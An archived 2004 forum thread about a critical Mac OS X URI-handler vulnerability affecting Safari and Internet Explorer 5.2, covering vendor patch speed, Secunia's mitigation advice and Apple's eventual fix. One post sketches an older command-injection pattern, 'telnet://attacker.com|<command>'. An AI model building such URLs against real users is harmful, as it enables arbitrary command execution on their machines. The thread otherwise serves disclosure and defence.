PDA

View Full Version : Finally - a serious vulnerability worth worrying a



chrism238
18th May 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is 'about')

Chris.

Danamania
18th May 2004, 10:05 AM
Originally posted by chrism238@May 18 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is 'about')

Chris.
There *WAS* another one just as bad, in August 2002.

a telnet:// URL could be used to attempt telnetting somewhere, which would create some output, which could then be piped out to any other command

something along the lines of telnet://attacker.com|<command>

That one was discovered one night by a japanese fellow, and the software update was available 9 hours later. Very cool work there by Apple. A bad bug, but a very good fix.

I&#39;ve always thought that currently, it&#39;s likely any OS size project has at least tens of security holes of various kinds, and the ONLY way to handle them properly is to patch each and every one asap, as soon as they&#39;re out. Patching in a stream, instead of saving up for larger security updates every six months. That kind of treatment is absolutely mandatory for a security problem like this.

Here&#39;s hoping that software update icon is bouncing away in my dock, soon&#33;

dana

Danamania
18th May 2004, 03:55 PM
Originally posted by chrism238@May 18 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is &#39;about&#39;)

Chris.
Reading the article about it more carefully, Apple were notified of this one on February 2004, and it was publicised on the 10th May, which is pretty sucky.

dana

stickman67
18th May 2004, 08:06 PM
Originally posted by danamania+May 18 2004, 03:55 PM--></div><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (danamania @ May 18 2004, 03:55 PM)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin-chrism238@May 18 2004, 07:51 AM
All the bloodthirsty details are available via apple.slashdot.org (http://apple.slashdot.org/article.pl?sid=04/05/17/1646216)

(oops, the last word in the title is &#39;about&#39;)

Chris.
Reading the article about it more carefully, Apple were notified of this one on February 2004, and it was publicised on the 10th May, which is pretty sucky.

dana [/b][/quote]
Yes, but there are other manufacturers of OSs (who shall remain nameless :P ) whose idea of a quick response is to release monthly patches on a schedule that is continually being interrupted as more things are found that need patching, which means they can never catch up with the things that they thought originally needed patching, some of which are actually quite serious.

*Phew&#33;*

:lol:

sillydog701
18th May 2004, 11:29 PM
MacCentral (http://maccentral.macworld.com/news/2004/05/17/safari/index.php?redirect=1084861609000) also has a report on this... it appears not just Safari 1.2.1 but also IE 5.2.

stickman67
19th May 2004, 12:21 PM
Originally posted by sillydog701@May 18 2004, 11:29 PM
MacCentral (http://maccentral.macworld.com/news/2004/05/17/safari/index.php?redirect=1084861609000) also has a report on this... it appears not just Safari 1.2.1 but also IE 5.2.
According to Secunia (http://secunia.com/advisories/11622/), who have issued an advisory lifting the vulnerability rating to "Extremely Critical", the problem may go beyond Safari and IE alone: "This has been confirmed on Macintosh OS X using Safari 1.2.1 (v125.1) and Internet Explorer 5.2. Other browsers may also be used as attack vectors." [emphasis added]

They say there is no real fix at this point, but the following strategies can help lower the risk:
Do not visit untrusted web sites.
Rename all URI handlers which are not required.
Do not surf the Internet as a privileged user.

Some of it is just common sense, of course.

Apparently another thing you can do to mitigate risk is to turn off the "Open &#39;safe&#39; files after downloading" option in Safari&#39;s general preferences.

There&#39;s also a little app listed at VersionTracker (http://www.versiontracker.com/dyn/moreinfo/macosx/23446) (called Don&#39;t Go There GURLfriend&#33; 1.0). I haven&#39;t tried it, and am certainly not advocating that you use it (at your own risk, folks&#33;), but feedback at VT suggests it works OK.

mbd
23rd May 2004, 06:59 PM
For anyone who hasn&#39;t noticed, Apple has released a security fix for this now - I urge anyone who hasn&#39;t installed the security update to do so immediately - it&#39;s <1mb and doesn&#39;t require a reboot.